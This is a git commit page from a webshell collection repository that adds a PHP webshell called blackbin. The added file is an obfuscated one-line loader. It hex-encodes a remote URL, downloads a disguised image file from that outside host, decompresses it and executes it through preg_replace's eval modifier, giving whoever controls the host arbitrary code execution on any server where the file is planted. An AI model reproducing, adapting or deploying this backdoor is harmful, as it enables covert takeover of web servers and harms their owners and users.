1
0
mirror of https://github.com/tennc/webshell.git synced 2026-02-12 16:36:38 +00:00

add blackbin for php webshell

super php webshell
This commit is contained in:
tennc
2014-03-20 14:26:07 +08:00
parent bcbc3a383c
commit 3097d20015
4 changed files with 1278 additions and 0 deletions

View File

@@ -0,0 +1,3 @@
<?php
error_reporting(0);session_start();header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649);@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);
?>